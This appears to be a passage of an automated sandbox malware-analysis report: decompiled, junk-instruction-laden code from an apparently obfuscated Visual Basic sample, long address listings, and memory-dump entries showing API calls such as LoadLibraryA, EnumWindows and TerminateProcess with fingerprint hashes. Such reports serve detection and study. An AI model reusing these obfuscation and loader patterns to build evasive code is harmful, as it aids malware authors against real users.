                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				0xeba5429b();
                              				asm("fxam");
                              				asm("fcomp st0, st7");
                              				if(_t85 < 0) {
                              					asm("wait");
                              				}
                              				if(_t85 < 0) {
                              					asm("wait");
                              				}
                              				_t54 = 0xbceeb6;
                              				if(_t85 < 0) {
                              					asm("wait");
                              				}
                              				_t55 = _t54 + 0x48ee20;
                              				if(_t55 < 0) {
                              					asm("wait");
                              					asm("fnop");
                              					asm("fcom st0, st2");
                              				}
                              				_t56 = _t55 - 0x7775f7;
                              				asm("fdivp st1, st0");
                              				asm("punpckhdq mm6, mm5");
                              				_t57 = _t56 - 0x610bb6;
                              				if (_t57 + 0x12b4df >= 0) goto L30;
                              				_t27 = _t41 - 0x2164ca8f;
                              				 *_t27 =  *((intOrPtr*)(_t41 - 0x2164ca8f)) + _t41;
                              				_t88 =  *_t27;
                              			}
























                              0x004014c0
                              0x004014c0
                              0x004014c0
                              0x004014c0
                              0x004014c5
                              0x004014ca
                              0x004014cc
                              0x004014ce
                              0x004014d0
                              0x004014d2
                              0x004014d4
                              0x004014d5
                              0x004014d7
                              0x004014d9
                              0x004014db
                              0x004014de
                              0x004014e4
                              0x004014e6
                              0x004014e7
                              0x004014e9
                              0x004014ea
                              0x004014eb
                              0x004014ec
                              0x004014ee
                              0x004014f0
                              0x004014f2
                              0x004014f4
                              0x004014f6
                              0x004014f7
                              0x004014f9
                              0x004014fa
                              0x004014fd
                              0x004014ff
                              0x00401501
                              0x00401505
                              0x00401507
                              0x0040150e
                              0x0040150f
                              0x00401511
                              0x00401512
                              0x00401514
                              0x00401516
                              0x00401518
                              0x00401519
                              0x0040151c
                              0x0040151d
                              0x0040151e
                              0x00401522
                              0x00401524
                              0x00401526
                              0x0040152e
                              0x00401530
                              0x00401532
                              0x00401534
                              0x00401536
                              0x00401537
                              0x00401538
                              0x0040153e
                              0x00401540
                              0x00401541
                              0x00401541
                              0x00401544
                              0x00401544
                              0x00401545
                              0x00401547
                              0x00401549
                              0x0040154b
                              0x0040154d
                              0x0040154f
                              0x00401551
                              0x00401553
                              0x00401555
                              0x00401557
                              0x00401559
                              0x0040155b
                              0x0040155d
                              0x0040155f
                              0x00401561
                              0x00401563
                              0x00401565
                              0x00401567
                              0x00401569
                              0x00000000
                              0x00000000
                              0x0040156b
                              0x0040156d
                              0x0040156e
                              0x00401573
                              0x00401576
                              0x00401579
                              0x0040157b
                              0x0040157c
                              0x0040157d
                              0x0040157e
                              0x0040157f
                              0x00401580
                              0x00401581
                              0x00401582
                              0x00401582
                              0x00401588
                              0x00401589
                              0x0040158a
                              0x0040158c
                              0x0040158e
                              0x00401590
                              0x00401592
                              0x00401595
                              0x00401598
                              0x0040159a
                              0x0040159b
                              0x0040159d
                              0x004015a0
                              0x004015a2
                              0x004015a3
                              0x004015a4
                              0x00000000
                              0x004015a6
                              0x004015a6
                              0x004015a8
                              0x004015aa
                              0x004015ac
                              0x004015af
                              0x004015b1
                              0x004015b3
                              0x004015b9
                              0x004015bb
                              0x004015bd
                              0x004015bf
                              0x004015c1
                              0x004015c3
                              0x004015c6
                              0x004015c8
                              0x004015ca
                              0x004015cc
                              0x004015ce
                              0x004015d0
                              0x004015d3
                              0x004015d5
                              0x004015d7
                              0x004015d9
                              0x004015db
                              0x004015dd
                              0x004015df
                              0x004015e1
                              0x004015e3
                              0x004015e5
                              0x004015e7
                              0x004015e9
                              0x004015eb
                              0x004015ed
                              0x004015ef
                              0x004015f1
                              0x004015f3
                              0x004015f5
                              0x004015f7
                              0x004015f9
                              0x004015fb
                              0x004015fd
                              0x004015ff
                              0x004015ff
                              0x004015ff
                              0x004015a4
                              0x00401601
                              0x00401603
                              0x00401605
                              0x00401607
                              0x00401609
                              0x0040160b
                              0x0040160d
                              0x0040160f
                              0x00401611
                              0x00401613
                              0x00401615
                              0x00401617
                              0x00401619
                              0x0040161b
                              0x0040161d
                              0x0040161f
                              0x00401621
                              0x00401623
                              0x00401625
                              0x00401627
                              0x00401629
                              0x0040162b
                              0x0040162d
                              0x0040162f
                              0x00401631
                              0x00401633
                              0x00401635
                              0x00401637
                              0x00401639
                              0x0040163b
                              0x0040163d
                              0x0040163f
                              0x00401641
                              0x00401643
                              0x00401645
                              0x00401647
                              0x00401649
                              0x0040164b
                              0x0040164d
                              0x0040164f
                              0x00401651
                              0x00401653
                              0x00401655
                              0x00401657
                              0x00401659
                              0x0040165b
                              0x0040165d
                              0x0040165f
                              0x00401661
                              0x00401663
                              0x00401665
                              0x00401667
                              0x00401669
                              0x0040166b
                              0x0040166d
                              0x0040166f
                              0x00401671
                              0x00401673
                              0x00401675
                              0x00401677
                              0x00401679
                              0x0040167b
                              0x0040167d
                              0x0040167f
                              0x00401681
                              0x00401683
                              0x00401685
                              0x00401687
                              0x00401689
                              0x0040168b
                              0x0040168d
                              0x0040168f
                              0x00401691
                              0x00401693
                              0x00401695
                              0x00401697
                              0x00401699
                              0x0040169b
                              0x0040169d
                              0x0040169f
                              0x004016a1
                              0x004016a3
                              0x004016a5
                              0x004016a7
                              0x004016a9
                              0x004016ab
                              0x004016ad
                              0x004016af
                              0x004016b1
                              0x004016b3
                              0x004016b5
                              0x004016b7
                              0x004016b9
                              0x004016bb
                              0x004016bd
                              0x004016bf
                              0x004016c1
                              0x004016c3
                              0x004016c5
                              0x004016c7
                              0x004016c9
                              0x004016cb
                              0x004016cd
                              0x004016cf
                              0x004016d1
                              0x004016d3
                              0x004016d5
                              0x004016d7
                              0x004016d9
                              0x004016db
                              0x004016dd
                              0x004016df
                              0x004016e1
                              0x004016e3
                              0x004016e5
                              0x004016e7
                              0x004016e9
                              0x004016eb
                              0x004016ed
                              0x004016ef
                              0x004016f1
                              0x004016f3
                              0x004016f5
                              0x004016f7
                              0x004016f9
                              0x004016fb
                              0x004016fd
                              0x004016ff
                              0x00401701
                              0x00401703
                              0x00401705
                              0x00401707
                              0x00401709
                              0x0040170b
                              0x0040170d
                              0x0040170f
                              0x00401711
                              0x00401713
                              0x00401715
                              0x00401717
                              0x00401719
                              0x0040171b
                              0x0040171d
                              0x0040171f
                              0x00401721
                              0x00401723
                              0x00401725
                              0x00401727
                              0x00401729
                              0x0040172b
                              0x0040172d
                              0x0040172f
                              0x00401731
                              0x00401733
                              0x00401735
                              0x00401737
                              0x00401739
                              0x0040173b
                              0x0040173d
                              0x0040173f
                              0x00401741
                              0x00401743
                              0x00401745
                              0x00401747
                              0x00401749
                              0x0040174b
                              0x0040174d
                              0x0040174f
                              0x00401751
                              0x00401753
                              0x00401755
                              0x00401757
                              0x00401759
                              0x0040175b
                              0x0040175d
                              0x0040175f
                              0x00401761
                              0x00401763
                              0x00401765
                              0x00401767
                              0x00401769
                              0x0040176b
                              0x0040176d
                              0x0040176f
                              0x00401771
                              0x00401773
                              0x00401775
                              0x00401777
                              0x00401779
                              0x0040177b
                              0x0040177d
                              0x0040177f
                              0x00401781
                              0x00401783
                              0x00401785
                              0x00401787
                              0x00401789
                              0x0040178b
                              0x0040178d
                              0x0040178f
                              0x00401791
                              0x00401793
                              0x00401795
                              0x00401797
                              0x00401799
                              0x0040179b
                              0x0040179d
                              0x0040179f
                              0x004017a1
                              0x004017a3
                              0x004017a5
                              0x004017a7
                              0x004017a9
                              0x004017ab
                              0x004017ad
                              0x004017af
                              0x004017c0
                              0x004017c2
                              0x004017e9
                              0x004017eb
                              0x004017eb
                              0x004017ec
                              0x004017ee
                              0x004017ee
                              0x004017ef
                              0x00401829
                              0x0040182b
                              0x0040182b
                              0x0040182c
                              0x00401832
                              0x00401834
                              0x00401835
                              0x00401837
                              0x00401837
                              0x00401863
                              0x0040186d
                              0x0040186f
                              0x0040189f
                              0x004018df
                              0x004018e0
                              0x004018e0
                              0x004018e0

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: #100
                              • String ID: VB5!6&*
                              • API String ID: 1341478452-3593831657
                              • Opcode ID: 17520e6b4ce9ad3dd05c157fabd9bf949adc044d3b54a68d24bd80d061ababce
                              • Instruction ID: 01360af248af9895badd6b05c6cebdc57fd959b8c3c71c79e422a3ca6e3bdbd4
                              • Opcode Fuzzy Hash: 17520e6b4ce9ad3dd05c157fabd9bf949adc044d3b54a68d24bd80d061ababce
                              • Instruction Fuzzy Hash: EED0A44168E3D14EC32323BA0D258112F31481362031B06EBA4D0DB0F3905C0A0AC32B
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c88c6c7956e3929cd4bd730432824d60d407ba09bef4d6d27aba740cffac3ef6
                              • Instruction ID: 83c480053f2fc916442c2dddd2c3da307a01b18acaa595577635c6945d82d1b0
                              • Opcode Fuzzy Hash: c88c6c7956e3929cd4bd730432824d60d407ba09bef4d6d27aba740cffac3ef6
                              • Instruction Fuzzy Hash: EAC16739240346EAD7326FA88D507E93366DF43798F3845CDECA4970E2E7358186CB82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 71c3ac5f9cf53af155a79b5c334198602c3b56004024e4b2088e441a46fd1023
                              • Instruction ID: 56c785250bcbf73060999a031bcabe8285f90279fd0a2e9ef24254cc939f7814
                              • Opcode Fuzzy Hash: 71c3ac5f9cf53af155a79b5c334198602c3b56004024e4b2088e441a46fd1023
                              • Instruction Fuzzy Hash: 10A16729240345EADB226FA8CC607EA3366DF437A8F7845CCEC94570D6D7369589CB82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 02BC6443: LoadLibraryA.KERNELBASE(?,082962C8,?,02BC07A4,?,?), ref: 02BC655D
                              • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000), ref: 02BC35CA
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: LibraryLoadProcessTerminate
                              • String ID:
                              • API String ID: 3349790660-0
                              • Opcode ID: 5519cbba1933ec1a9cc0057b38a598cba844620e476de6d45e9b1ec4786998e1
                              • Instruction ID: f80cdaa48bbeaf3b1ffe26bec6a5b86545e93f17477477ba5bc364171930c264
                              • Opcode Fuzzy Hash: 5519cbba1933ec1a9cc0057b38a598cba844620e476de6d45e9b1ec4786998e1
                              • Instruction Fuzzy Hash: 7E81A1356403069BEB3079A88DA0BFA225BCF837E4F7406ADFCDAA71D5DB2984C5C511
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 736cfbeae6e22f6c0428ae215703abe2b8eb709943dbfc7e1c5728f2596bef01
                              • Instruction ID: a3e2c17a7fa077ddceb18c7007d62c0a4adc14305614dc6833612174557d648f
                              • Opcode Fuzzy Hash: 736cfbeae6e22f6c0428ae215703abe2b8eb709943dbfc7e1c5728f2596bef01
                              • Instruction Fuzzy Hash: 0E819125640306ABEB3179688DA0BFA235BCF837F4F78029DECDAA71D5DB2584C5C611
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f4ab53002ebe8a37f6b814118cb486d1ee180157dac15f39f7e04bf67158b066
                              • Instruction ID: bf55b0c284fd3c86bb34bff9fe75061dcc2385bbff9947c6864dffcb1308eae3
                              • Opcode Fuzzy Hash: f4ab53002ebe8a37f6b814118cb486d1ee180157dac15f39f7e04bf67158b066
                              • Instruction Fuzzy Hash: A6917838100386EADB316FACC9647EA7367DF437A8F78458DED94970D2D7358489CA82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bb40a4aa0621441d3ab20f4cdabea94749fc1f135198be1d05e805a52ea00073
                              • Instruction ID: 1986c55df26ba3d62e02824c5d21e3e78b8da73a985f713261e588b02083c163
                              • Opcode Fuzzy Hash: bb40a4aa0621441d3ab20f4cdabea94749fc1f135198be1d05e805a52ea00073
                              • Instruction Fuzzy Hash: 3E71BE24640305ABEB3439688DA0BFA235BCF837F0F78069DECDAA71D5DB2984C5C511
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b7e015284a437258f3e98d186abe0b84d07016f276be37cf73cc4b830a44d08c
                              • Instruction ID: 92256e9a7249f86ced57f444c3585c10e114bc892761cab4d0d0e58769a95e38
                              • Opcode Fuzzy Hash: b7e015284a437258f3e98d186abe0b84d07016f276be37cf73cc4b830a44d08c
                              • Instruction Fuzzy Hash: 6561BF24640305ABEB3139688CB0BFA2397DF837F0F78469DEDD9A71D5DB298484C611
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • LdrInitializeThunk.NTDLL(?,?,?,02BC1656,00000000,00000000,00000000,00000000,00000105,0000034D,?,02BC3E1B,?,?,00000004), ref: 02BC4E03
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 2c4209c57c3197bb7f67a6cc64fe49b9cbe400658ad918d9ec6afbaf69ec6e5f
                              • Instruction ID: b67d10079e2df0f5160771bd3ebb7125ccf5fae9ecb2a84f3f63fdfde810d82a
                              • Opcode Fuzzy Hash: 2c4209c57c3197bb7f67a6cc64fe49b9cbe400658ad918d9ec6afbaf69ec6e5f
                              • Instruction Fuzzy Hash: 709191791047C6EAC727AFA98565219BB72EF1375CB28A4CDC0904A463D3319666CBC3
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a3fa97eb37272463521b7f500a0d281e25c31a93997c69c7212d94020f3d56e3
                              • Instruction ID: f5edfdc0221cf3132f0f8d52311520b9a1fff1d74e4a3a77efbd52f6ae3ac9fb
                              • Opcode Fuzzy Hash: a3fa97eb37272463521b7f500a0d281e25c31a93997c69c7212d94020f3d56e3
                              • Instruction Fuzzy Hash: 098182791007CAEAC7225FAED9152187762EF13B5CFB891C9D1908A863E331D596CBC3
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 22c41d93b9d4d32eb2d4e0e5d66e715f0546d581478e5a78aac8b680d5ca1f86
                              • Instruction ID: 65f5977ae053e3b62f0494b312c1f885f936082f7d74b0df99955db38969eafd
                              • Opcode Fuzzy Hash: 22c41d93b9d4d32eb2d4e0e5d66e715f0546d581478e5a78aac8b680d5ca1f86
                              • Instruction Fuzzy Hash: 2151AF20640305ABEB3539688DA0BFA236BDF837E0F78429DEDD9A71D5DB398584C611
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: 73b974f0c7eefe53faa0dc30221ae6a4f6ff9259dbfe81ebf198bf96d209ad84
                              • Instruction ID: a277c16eac75c391391f6ef1dec74ecd61c91bbc23538c4543e867bdd219d4a3
                              • Opcode Fuzzy Hash: 73b974f0c7eefe53faa0dc30221ae6a4f6ff9259dbfe81ebf198bf96d209ad84
                              • Instruction Fuzzy Hash: C351A1216403059BEB3529688C60BFA235BDF837A0F78429DEDC9A71D5DB398985C611
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 12f41c81427efbbf4d7b9ec1998ea81743377db75881a79a32456aa42bcdb651
                              • Instruction ID: b141557a6a9d64646c375051517a4844eea03ea6e4b6f4097e68424675c23860
                              • Opcode Fuzzy Hash: 12f41c81427efbbf4d7b9ec1998ea81743377db75881a79a32456aa42bcdb651
                              • Instruction Fuzzy Hash: 4E61A434640386EAEB222F6D8C543A93366DF83768F7841CDEC849B0D6C735C586CB82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cff9879b3ef841995e58a88df3690a2a85ff46a955b089b182065a1e4ede603e
                              • Instruction ID: bb697b47b88533a72b2f3fea4322bfe3078e9e3366950e90bd4b1654f8e4e800
                              • Opcode Fuzzy Hash: cff9879b3ef841995e58a88df3690a2a85ff46a955b089b182065a1e4ede603e
                              • Instruction Fuzzy Hash: 7E51AD20640345ABEB3529288DA0BFA236BDF837A0F78429DEDC9A71D5DB39C5C5C611
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000), ref: 02BC35CA
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID:
                              • API String ID: 560597551-0
                              • Opcode ID: c685e2c158e889bbfe5df3acfc31f2ea8a63b0664322f36629a1d7a30eff2dc3
                              • Instruction ID: 1878442c5f0291e85f14b1b575c2bfc4e5704e89e79c42cd4de8ef096cfbfd25
                              • Opcode Fuzzy Hash: c685e2c158e889bbfe5df3acfc31f2ea8a63b0664322f36629a1d7a30eff2dc3
                              • Instruction Fuzzy Hash: 2651CE216403419FEB3529388CA0BFA236BDF833A0F7842DCECC9AB1D5CB359585C611
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 714f3693483afdceab402e207c2877cfbcc5a4eefce4234811b5e81b39b522e1
                              • Instruction ID: faf9811623cbb7d83a60c1d3dfdd99449c21db18694a6f5ed20fca73f5b98822
                              • Opcode Fuzzy Hash: 714f3693483afdceab402e207c2877cfbcc5a4eefce4234811b5e81b39b522e1
                              • Instruction Fuzzy Hash: B2618634640386EADB322F6DC9543A87367DF43B58F78458DDC8497096DB35C586CAC2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: 4255957fafa37fe1d12ad29c49aa924eaaebb8769554b4efe440bf708b25099e
                              • Instruction ID: e20d66b23414f5d7b655d92f66af5096d60138545043319b2991ba855f86d327
                              • Opcode Fuzzy Hash: 4255957fafa37fe1d12ad29c49aa924eaaebb8769554b4efe440bf708b25099e
                              • Instruction Fuzzy Hash: 1E51AF216403415AEF3529288CA4BFA236BDF837A0F78429DECC9A71D5CB74C5C58511
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2c41a91ccc8d0c9f0ff99e41043b13ce5f838025684dbe2203a8eeb3be13dbc6
                              • Instruction ID: 3f4914fef3f7f721f38673ea3ff85fb6d4c661d1a2b11b06bc2c10425cdfc788
                              • Opcode Fuzzy Hash: 2c41a91ccc8d0c9f0ff99e41043b13ce5f838025684dbe2203a8eeb3be13dbc6
                              • Instruction Fuzzy Hash: 9151EF382007C6EACB22AFAAC9553687762EF4375CF6880CDD45457493D336D696CBC2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 879ac38e3bcbeeb57039e961c2af766519090d7571e063a0a95ace59965c0791
                              • Instruction ID: a7a2bc439f7ceb86f449cca095367cb186770d73dba1a3d34bfe8bd63ab56b00
                              • Opcode Fuzzy Hash: 879ac38e3bcbeeb57039e961c2af766519090d7571e063a0a95ace59965c0791
                              • Instruction Fuzzy Hash: 8151E2396047C6EAC7239FA9D5553447BA2EF53718F2890CDC0904B4A3D372A662CBC3
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e9c3a48fafc23e7a0a0f0c94356739a9faf55d7d6a995bf0522a789389d8a7bb
                              • Instruction ID: 6170124c4c584ae807ee7e5ecc9a64efeb1e35a927abbcc34b057d8f8fa5f084
                              • Opcode Fuzzy Hash: e9c3a48fafc23e7a0a0f0c94356739a9faf55d7d6a995bf0522a789389d8a7bb
                              • Instruction Fuzzy Hash: 6531C0A05043876FEB152A2C4D50FFF2B6A9FC37A4F7941ECED89A3146C329C4418621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • LoadLibraryA.KERNELBASE(?,082962C8,?,02BC07A4,?,?), ref: 02BC655D
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: 383f92578296b4bb14f7cb704284a452253cd8208f7c32cdace9a7ff6910d05d
                              • Instruction ID: b64e7dade0133f1a773e0acf1c9cfdbba7e420e0a91a7ea97b60e6ca85051070
                              • Opcode Fuzzy Hash: 383f92578296b4bb14f7cb704284a452253cd8208f7c32cdace9a7ff6910d05d
                              • Instruction Fuzzy Hash: 623189716003067EDE312A249D50FEE23AB8FC6BB0F7402ADFE99721D5C76289828561
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c015ffc80dfa40ae6bbca32f093035dfd45c6b52949b94cb72fe4d50f681aaf5
                              • Instruction ID: b723395ceb34e50a90711b21b65f47b695db834b66cb9750f06ed4ef44378101
                              • Opcode Fuzzy Hash: c015ffc80dfa40ae6bbca32f093035dfd45c6b52949b94cb72fe4d50f681aaf5
                              • Instruction Fuzzy Hash: 0741627A1406CAF6C7279FAAD94531477A2EB13B0CFA490C9E1504A463E372D666CBC3
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • EnumWindows.USER32(02BC0764,?,00000000,00000000,02BC0CD2,00000000,?,00003000,00000004), ref: 02BC0748
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: EnumWindows
                              • String ID:
                              • API String ID: 1129996299-0
                              • Opcode ID: 19810fc18639b5debef2e02ef2e3e3fe13576ed207f3e21a3f4805c94a1c57d1
                              • Instruction ID: 181a5323bbf56605a1a6549e2b3305652ec1eaf86696ab8623ecff428e51f37b
                              • Opcode Fuzzy Hash: 19810fc18639b5debef2e02ef2e3e3fe13576ed207f3e21a3f4805c94a1c57d1
                              • Instruction Fuzzy Hash: 164173391406C6EAC727AFAAD9452187762EB1371CF6498C9D0648B4A3D332D5A7CFC3
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: e64c23e13c32f8643f38d1e179c66e94de2ad5987705601e191f1afbddcf217d
                              • Instruction ID: 801b605bfdbdeb10e7a3fa3ca9f01ee32ba5390b22af07ee16aa8d7625b2540d
                              • Opcode Fuzzy Hash: e64c23e13c32f8643f38d1e179c66e94de2ad5987705601e191f1afbddcf217d
                              • Instruction Fuzzy Hash: 2F31E4380002CBDAC7255FFC867521ABBB2EF13B58779A1CAC04046462D7319606CFD3
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • LoadLibraryA.KERNELBASE(?,082962C8,?,02BC07A4,?,?), ref: 02BC655D
                                • Part of subcall function 02BC42FD: LdrInitializeThunk.NTDLL(?,?,?,02BC1656,00000000,00000000,00000000,00000000,00000105,0000034D,?,02BC3E1B,?,?,00000004), ref: 02BC4E03
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: InitializeLibraryLoadThunk
                              • String ID:
                              • API String ID: 3353482560-0
                              • Opcode ID: 3fcdd6fed596f870552312108466cfbd88c12ff70a3d37bbd3475e0db6454247
                              • Instruction ID: 20b42633654cf0f50178a3574bd228daccbac0207799d67db5c41dbe4d02fcb8
                              • Opcode Fuzzy Hash: 3fcdd6fed596f870552312108466cfbd88c12ff70a3d37bbd3475e0db6454247
                              • Instruction Fuzzy Hash: 8B21B474210349AFEF343E288E90FED375BDF817A4FA441ADEE8955095D775C6818A02
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • LoadLibraryA.KERNELBASE(?,082962C8,?,02BC07A4,?,?), ref: 02BC655D
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: 4b051b4d6652e68646c262e27452ac15aaa43575d54eb3e0feee4a5166e5b50e
                              • Instruction ID: 67c7b357f1eb13ed0f8ebc96fb52a7f0d6a6888bd5d542a3edf79723b2dc2ef0
                              • Opcode Fuzzy Hash: 4b051b4d6652e68646c262e27452ac15aaa43575d54eb3e0feee4a5166e5b50e
                              • Instruction Fuzzy Hash: 9A110D74700389AEDF342F249E50BFD336ACF81BA0FB4419CEE9556045C7348682C601
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • LdrInitializeThunk.NTDLL(?,?,?,02BC1656,00000000,00000000,00000000,00000000,00000105,0000034D,?,02BC3E1B,?,?,00000004), ref: 02BC4E03
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 8b536be6edf668e6e23a087ac13e9d84df8f0cef77887af83a577ccf9d7c23c1
                              • Instruction ID: db1e12ee773909ffc58002f04f0da9ed186376665ca77bd8b7b879f0c593bf0e
                              • Opcode Fuzzy Hash: 8b536be6edf668e6e23a087ac13e9d84df8f0cef77887af83a577ccf9d7c23c1
